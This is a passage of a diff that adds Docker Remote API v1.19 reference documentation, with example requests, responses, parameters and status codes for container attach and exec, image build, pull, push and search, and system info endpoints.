+
+    POST /v1.19/containers/e90e34656806/unpause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Attach to a container
+
+`POST /containers/(id or name)/attach`
+
+Attach to the container `id`
+
+**Example request**:
+
+    POST /v1.19/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 101 UPGRADED
+    Content-Type: application/vnd.docker.raw-stream
+    Connection: Upgrade
+    Upgrade: tcp
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+**Stream details**:
+
+When using the TTY setting is enabled in
+[`POST /containers/create`
+](#create-a-container),
+the stream is the raw data from the process PTY and client's `stdin`.
+When the TTY is disabled, then the stream is multiplexed to separate
+`stdout` and `stderr`.
+
+The format is a **Header** and a **Payload** (frame).
+
+**HEADER**
+
+The header contains the information which the stream writes (`stdout` or
+`stderr`). It also contains the size of the associated frame encoded in the
+last four bytes (`uint32`).
+
+It is encoded on the first eight bytes like this:
+
+    header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+
+`STREAM_TYPE` can be:
+
+-   0: `stdin` (is written on `stdout`)
+-   1: `stdout`
+-   2: `stderr`
+
+`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of
+the `uint32` size encoded as big endian.
+
+**PAYLOAD**
+
+The payload is the raw stream.
+
+**IMPLEMENTATION**
+
+The simplest way to implement the Attach protocol is the following:
+
+    1.  Read eight bytes.
+    2.  Choose `stdout` or `stderr` depending on the first byte.
+    3.  Extract the frame size from the last four bytes.
+    4.  Read the extracted size and output it on the correct output.
+    5.  Goto 1.
+
+#### Attach to a container (websocket)
+
+`GET /containers/(id or name)/attach/ws`
+
+Attach to the container `id` via websocket
+
+Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455)
+
+**Example request**
+
+    GET /v1.19/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+
+**Example response**
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Wait a container
+
+`POST /containers/(id or name)/wait`
+
+Block until container `id` stops, then returns the exit code
+
+**Example request**:
+
+    POST /v1.19/containers/16253994b7c4/wait HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"StatusCode": 0}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Remove a container
+
+`DELETE /containers/(id or name)`
+
+Remove the container `id` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.19/containers/16253994b7c4?v=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **v** – 1/True/true or 0/False/false, Remove the volumes
+        associated to the container. Default `false`.
+-   **force** - 1/True/true or 0/False/false, Kill then remove the container.
+        Default `false`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** – conflict
+-   **500** – server error
+
+#### Copy files or folders from a container
+
+`POST /containers/(id or name)/copy`
+
+Copy files or folders of container `id`
+
+**Example request**:
+
+    POST /v1.19/containers/4fa6e0f0c678/copy HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Resource": "test.txt"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+### 2.2 Images
+
+#### List Images
+
+`GET /images/json`
+
+**Example request**:
+
+    GET /v1.19/images/json?all=0 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+         "RepoTags": [
+           "ubuntu:12.04",
+           "ubuntu:precise",
+           "ubuntu:latest"
+         ],
+         "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c",
+         "Created": 1365714795,
+         "Size": 131506275,
+         "VirtualSize": 131506275,
+         "Labels": {}
+      },
+      {
+         "RepoTags": [
+           "ubuntu:12.10",
+           "ubuntu:quantal"
+         ],
+         "ParentId": "27cf784147099545",
+         "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+         "Created": 1364102658,
+         "Size": 24653,
+         "VirtualSize": 180116135,
+         "Labels": {
+            "com.example.version": "v1"
+         }
+      }
+    ]
+
+**Example request, with digest information**:
+
+    GET /v1.19/images/json?digests=1 HTTP/1.1
+
+**Example response, with digest information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "Created": 1420064636,
+        "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125",
+        "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2",
+        "RepoDigests": [
+          "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+        ],
+        "RepoTags": [
+          "localhost:5000/test/busybox:latest",
+          "playdate:latest"
+        ],
+        "Size": 0,
+        "VirtualSize": 2429728,
+        "Labels": {}
+      }
+    ]
+
+The response shows a single image `Id` associated with two repositories
+(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use
+either of the `RepoTags` values `localhost:5000/test/busybox:latest` or
+`playdate:latest` to reference the image.
+
+You can also use `RepoDigests` values to reference an image. In this response,
+the array has only one reference and that is to the
+`localhost:5000/test/busybox` repository; the `playdate` repository has no
+digest. You can reference this digest using the value:
+`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...`
+
+See the `docker run` and `docker build` commands for examples of digest and tag
+references on the command line.
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, default false
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `dangling=true`
+  -   `label=key` or `label="key=value"` of an image label
+-   **filter** - only return images with the specified name
+
+#### Build image from a Dockerfile
+
+`POST /build`
+
+Build an image from a Dockerfile
+
+**Example request**:
+
+    POST /v1.19/build HTTP/1.1
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"stream": "Step 1/5..."}
+    {"stream": "..."}
+    {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}}
+
+The input stream must be a `tar` archive compressed with one of the
+following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`.
+
+The archive must include a build instructions file, typically called
+`Dockerfile` at the archive's root. The `dockerfile` parameter may be
+used to specify a different build instructions file. To do this, its value must be
+the path to the alternate build instructions file to use.
+
+The archive may include any number of other files,
+which are accessible in the build context (See the [*ADD build
+command*](../reference/builder.md#add)).
+
+The Docker daemon performs a preliminary validation of the `Dockerfile` before
+starting the build, and returns an error if the syntax is incorrect. After that,
+each instruction is run one-by-one until the ID of the new image is output.
+
+The build is canceled if the client drops the connection by quitting
+or being killed.
+
+**Query parameters**:
+
+-   **dockerfile** - Path within the build context to the Dockerfile. This is
+        ignored if `remote` is specified and points to an individual filename.
+-   **t** – A name and optional tag to apply to the image in the `name:tag` format.
+        If you omit the `tag` the default `latest` value is assumed.
+-   **remote** – A Git repository URI or HTTP/HTTPS URI build source. If the
+        URI specifies a filename, the file's contents are placed into a file
+        called `Dockerfile`.
+-   **q** – Suppress verbose build output.
+-   **nocache** – Do not use the cache when building the image.
+-   **pull** - Attempt to pull the image even if an older image exists locally.
+-   **rm** - Remove intermediate containers after a successful build (default behavior).
+-   **forcerm** - Always remove intermediate containers (includes `rm`).
+-   **memory** - Set memory limit for build.
+-   **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap.
+-   **cpushares** - CPU shares (relative weight).
+-   **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`).
+-   **cpuperiod** - The length of a CPU period in microseconds.
+-   **cpuquota** - Microseconds of CPU time that the container can get in a CPU period.
+
+**Request Headers**:
+
+-   **Content-type** – Set to `"application/tar"`.
+-   **X-Registry-Config** – base64-encoded ConfigFile object
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Create an image
+
+`POST /images/create`
+
+Create an image either by pulling it from the registry or by importing it
+
+**Example request**:
+
+    POST /v1.19/images/create?fromImage=busybox&tag=latest HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pulling..."}
+    {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}}
+    {"error": "Invalid..."}
+    ...
+
+When using this endpoint to pull an image from the registry, the
+`X-Registry-Auth` header can be used to include
+a base64-encoded AuthConfig object.
+
+**Query parameters**:
+
+-   **fromImage** – Name of the image to pull.
+-   **fromSrc** – Source to import.  The value may be a URL from which the image
+        can be retrieved or `-` to read the image from the request body.
+-   **repo** – Repository name.
+-   **tag** – Tag. If empty when pulling an image, this causes all tags
+        for the given image to be pulled.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** - repository does not exist or no read access
+-   **500** – server error
+
+
+
+#### Inspect an image
+
+`GET /images/(name)/json`
+
+Return low-level information on the image `name`
+
+**Example request**:
+
+    GET /v1.19/images/ubuntu/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Created": "2013-03-23T22:24:18.818426-07:00",
+       "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0",
+       "ContainerConfig": {
+          "Hostname": "",
+          "User": "",
+          "AttachStdin": false,
+          "AttachStdout": false,
+          "AttachStderr": false,
+          "Tty": true,
+          "OpenStdin": true,
+          "StdinOnce": false,
+          "Env": null,
+          "Cmd": ["/bin/bash"],
+          "Dns": null,
+          "Image": "ubuntu",
+          "Labels": {
+             "com.example.vendor": "Acme",
+             "com.example.license": "GPL",
+             "com.example.version": "1.0"
+          },
+          "Volumes": null,
+          "VolumesFrom": "",
+          "WorkingDir": ""
+       },
+       "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+       "Parent": "27cf784147099545",
+       "Size": 6824592
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Get the history of an image
+
+`GET /images/(name)/history`
+
+Return the history of the image `name`
+
+**Example request**:
+
+    GET /v1.19/images/ubuntu/history HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+        {
+            "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710",
+            "Created": 1398108230,
+            "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /",
+            "Tags": [
+                "ubuntu:lucid",
+                "ubuntu:10.04"
+            ],
+            "Size": 182964289,
+            "Comment": ""
+        },
+        {
+            "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8",
+            "Created": 1398108222,
+            "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/",
+            "Tags": null,
+            "Size": 0,
+            "Comment": ""
+        },
+        {
+            "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158",
+            "Created": 1371157430,
+            "CreatedBy": "",
+            "Tags": [
+                "scratch12:latest",
+                "scratch:latest"
+            ],
+            "Size": 0,
+            "Comment": "Imported from -"
+        }
+    ]
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.19/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`.  This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+**Example request**:
+
+    POST /v1.19/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+-   **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.19/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+-   **repo** – The repository to tag in
+-   **force** – 1/True/true or 0/False/false, default false
+-   **tag** - The new tag name
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.19/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+-   **force** – 1/True/true or 0/False/false, default false
+-   **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com). This API
+returns both `is_trusted` and `is_automated` images. Currently, they
+are considered identical. In the future, the `is_trusted` property will
+be deprecated and replaced by the `is_automated` property.
+
+> **Note**:
+> The response keys have changed from API v1.6 to reflect the JSON
+> sent by the registry server to the docker daemon's request.
+
+**Example request**:
+
+    GET /v1.19/images/search?term=sshd HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+            {
+                "star_count": 12,
+                "is_official": false,
+                "name": "wma55/u1210sshd",
+                "is_trusted": false,
+                "is_automated": false,
+                "description": ""
+            },
+            {
+                "star_count": 10,
+                "is_official": false,
+                "name": "jdswinbank/sshd",
+                "is_trusted": false,
+                "is_automated": false,
+                "description": ""
+            },
+            {
+                "star_count": 18,
+                "is_official": false,
+                "name": "vgauthier/sshd",
+                "is_trusted": false,
+                "is_automated": false,
+                "description": ""
+            }
+    ...
+    ]
+
+**Query parameters**:
+
+-   **term** – term to search
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+### 2.3 Misc
+
+#### Check auth configuration
+
+`POST /auth`
+
+Get the default username and email
+
+**Example request**:
+
+    POST /v1.19/auth HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "username": "hannibal",
+         "password": "xxxx",
+         "email": "hannibal@a-team.com",
+         "serveraddress": "https://index.docker.io/v1/"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **204** – no error
+-   **500** – server error
+
+#### Display system-wide information
+
+`GET /info`
+
+Display system-wide information
+
+**Example request**:
+
+    GET /v1.19/info HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+        "Containers": 11,
+        "CpuCfsPeriod": true,
+        "CpuCfsQuota": true,
+        "Debug": false,
+        "DockerRootDir": "/var/lib/docker",
+        "Driver": "btrfs",
+        "DriverStatus": [[""]],
+        "ExecutionDriver": "native-0.1",
+        "ExperimentalBuild": false,
+        "HttpProxy": "http://test:test@localhost:8080",
+        "HttpsProxy": "https://test:test@localhost:8080",
+        "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS",
+        "IPv4Forwarding": true,
+        "Images": 16,
+        "IndexServerAddress": "https://index.docker.io/v1/",
+        "InitPath": "/usr/bin/docker",
+        "InitSha1": "",
+        "KernelVersion": "3.12.0-1-amd64",
+        "Labels": [
+            "storage=ssd"
+        ],
+        "MemTotal": 2099236864,
+        "MemoryLimit": true,
+        "NCPU": 1,
+        "NEventsListener": 0,
+        "NFd": 11,
+        "NGoroutines": 21,
+        "Name": "prod-server-42",
+        "NoProxy": "9.81.1.160",
+        "OomKillDisable": true,
+        "OperatingSystem": "Boot2Docker",
+        "RegistryConfig": {
+            "IndexConfigs": {
+                "docker.io": {
+                    "Mirrors": null,
+                    "Name": "docker.io",
+                    "Official": true,
+                    "Secure": true
+                }
+            },
+            "InsecureRegistryCIDRs": [
+                "127.0.0.0/8"
+            ]
+        },
+        "SwapLimit": false,
+        "SystemTime": "2015-03-10T11:11:23.730591467-07:00"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Show the docker version information
+
+`GET /version`
+
+Show the docker version information
+
+**Example request**:
+
+    GET /v1.19/version HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+         "Version": "1.5.0",
+         "Os": "linux",
+         "KernelVersion": "3.18.5-tinycore64",
+         "GoVersion": "go1.4.1",
+         "GitCommit": "a8a31ef",
+         "Arch": "amd64",
+         "ApiVersion": "1.19"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Ping the docker server
+
+`GET /_ping`
+
+Ping the docker server
+
+**Example request**:
+
+    GET /v1.19/_ping HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a new image from a container's changes
+
+`POST /commit`
+
+Create a new image from a container's changes
+
+**Example request**:
+
+    POST /v1.19/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Hostname": "",
+         "Domainname": "",
+         "User": "",
+         "AttachStdin": false,
+         "AttachStdout": true,
+         "AttachStderr": true,
+         "PortSpecs": null,
+         "Tty": false,
+         "OpenStdin": false,
+         "StdinOnce": false,
+         "Env": null,
+         "Cmd": [
+                 "date"
+         ],
+         "Volumes": {
+                 "/tmp": {}
+         },
+         "Labels": {
+                 "key1": "value1",
+                 "key2": "value2"
+          },
+         "WorkingDir": "",
+         "NetworkDisabled": false,
+         "ExposedPorts": {
+                 "22/tcp": {}
+         }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {"Id": "596069db4bf5"}
+
+**JSON parameters**:
+
+-  **config** - the container's configuration
+
+**Query parameters**:
+
+-   **container** – source container
+-   **repo** – repository
+-   **tag** – tag
+-   **comment** – commit message
+-   **author** – author (e.g., "John Hannibal Smith
+    <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>")
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Monitor Docker's events
+
+`GET /events`
+
+Get container events from docker, in real time via streaming.
+
+Docker containers report the following events:
+
+    attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause
+
+Docker images report the following events:
+
+    untag, delete
+
+**Example request**:
+
+    GET /v1.19/events?since=1374067924
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924}
+    {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924}
+    {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966}
+    {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970}
+
+**Query parameters**:
+
+-   **since** – Timestamp. Show all events created since timestamp and then stream
+-   **until** – Timestamp. Show events created until given timestamp and stop streaming
+-   **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters:
+  -   `container=<string>`; -- container to filter
+  -   `event=<string>`; -- event to filter
+  -   `image=<string>`; -- image to filter
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images in a repository
+
+`GET /images/(name)/get`
+
+Get a tarball containing all images and metadata for the repository specified
+by `name`.
+
+If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image
+(and its parents) are returned. If `name` is an image ID, similarly only that
+image (and its parents) are returned, but with the exclusion of the
+'repositories' file in the tarball, as there were no image names referenced.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.19/images/ubuntu/get
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images
+
+`GET /images/get`
+
+Get a tarball containing all images and metadata for one or more repositories.
+
+For each value of the `names` parameter: if it is a specific name and tag (e.g.
+`ubuntu:latest`), then only that image (and its parents) are returned; if it is
+an image ID, similarly only that image (and its parents) are returned and there
+would be no names referenced in the 'repositories' file for this image ID.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.19/images/get?names=myname%2Fmyapp%3Alatest&names=busybox
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Load a tarball with a set of images and tags into docker
+
+`POST /images/load`
+
+Load a set of images and tags into a Docker repository.
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    POST /v1.19/images/load
+    Content-Type: application/x-tar
+
+    Tarball in body
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Image tarball format
+
+An image tarball contains one directory per image layer (named using its long ID),
+each containing these files:
+
+- `VERSION`: currently `1.0` - the file format version
+- `json`: detailed layer information, similar to `docker inspect layer_id`
+- `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories
+for storing attribute changes and deletions.
+
+If the tarball defines a repository, the tarball should also include a `repositories` file at
+the root that contains a list of repository and tag names mapped to layer IDs.
+
+```
+{"hello-world":
+    {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"}
+}
+```
+
+#### Exec Create
+
+`POST /containers/(id or name)/exec`
+
+Sets up an exec instance in a running container `id`
+
+**Example request**:
+
+    POST /v1.19/containers/e90e34656806/exec HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "AttachStdin": true,
+      "AttachStdout": true,
+      "AttachStderr": true,
+      "Cmd": ["sh"],
+      "Tty": true,
+      "User": "123:456"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+         "Id": "f90e34656806",
+         "Warnings":[]
+    }
+
+**JSON parameters**:
+
+-   **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command.
+-   **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command.
+-   **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **User** - A string value specifying the user, and optionally, group to run
+        the exec process inside the container. Format is one of: `"user"`,
+        `"user:group"`, `"uid"`, or `"uid:gid"`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+
+#### Exec Start
+
+`POST /exec/(id)/start`
+
+Starts a previously set up `exec` instance `id`. If `detach` is true, this API
+returns after starting the `exec` command. Otherwise, this API sets up an
+interactive session with the `exec` command.
+
+**Example request**:
+
+    POST /v1.19/exec/e90e34656806/start HTTP/1.1
+    Content-Type: application/json
+
+    {
+     "Detach": false,
+     "Tty": false
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/vnd.docker.raw-stream
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**JSON parameters**:
+
+-   **Detach** - Detach from the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`.  The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.19/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.19/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: plain/text
+
+    {
+      "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39",
+      "Running" : false,
+      "ExitCode" : 2,
+      "ProcessConfig" : {
+        "privileged" : false,
+        "user" : "",
+        "tty" : false,
+        "entrypoint" : "sh",
+        "arguments" : [
+          "-c",
+          "exit 2"
+        ]
+      },
+      "OpenStdin" : false,
+      "OpenStderr" : false,
+      "OpenStdout" : false,
+      "Container" : {
+        "State" : {
+          "Running" : true,
+          "Paused" : false,
+          "Restarting" : false,
+          "OOMKilled" : false,
+          "Pid" : 3650,
+          "ExitCode" : 0,
+          "Error" : "",
+          "StartedAt" : "2014-11-17T22:26:03.717657531Z",
+          "FinishedAt" : "0001-01-01T00:00:00Z"
+        },
+        "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c",
+        "Created" : "2014-11-17T22:26:03.626304998Z",
+        "Path" : "date",
+        "Args" : [],
+        "Config" : {
+          "Hostname" : "8f177a186b97",
+          "Domainname" : "",
+          "User" : "",
+          "AttachStdin" : false,
+          "AttachStdout" : false,
+          "AttachStderr" : false,
+          "PortSpecs": null,
+          "ExposedPorts" : null,
+          "Tty" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ],
+          "Cmd" : [
+            "date"
+          ],
+          "Image" : "ubuntu",
+          "Volumes" : null,
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "NetworkDisabled" : false,
+          "MacAddress" : "",
+          "OnBuild" : null,
+          "SecurityOpt" : null
+        },
+        "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5",
+        "NetworkSettings" : {
+          "IPAddress" : "172.17.0.2",
+          "IPPrefixLen" : 16,
+          "MacAddress" : "02:42:ac:11:00:02",
+          "Gateway" : "172.17.42.1",
+          "Bridge" : "docker0",
+          "PortMapping" : null,
+          "Ports" : {}
+        },
+        "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf",
+        "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname",
+        "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts",
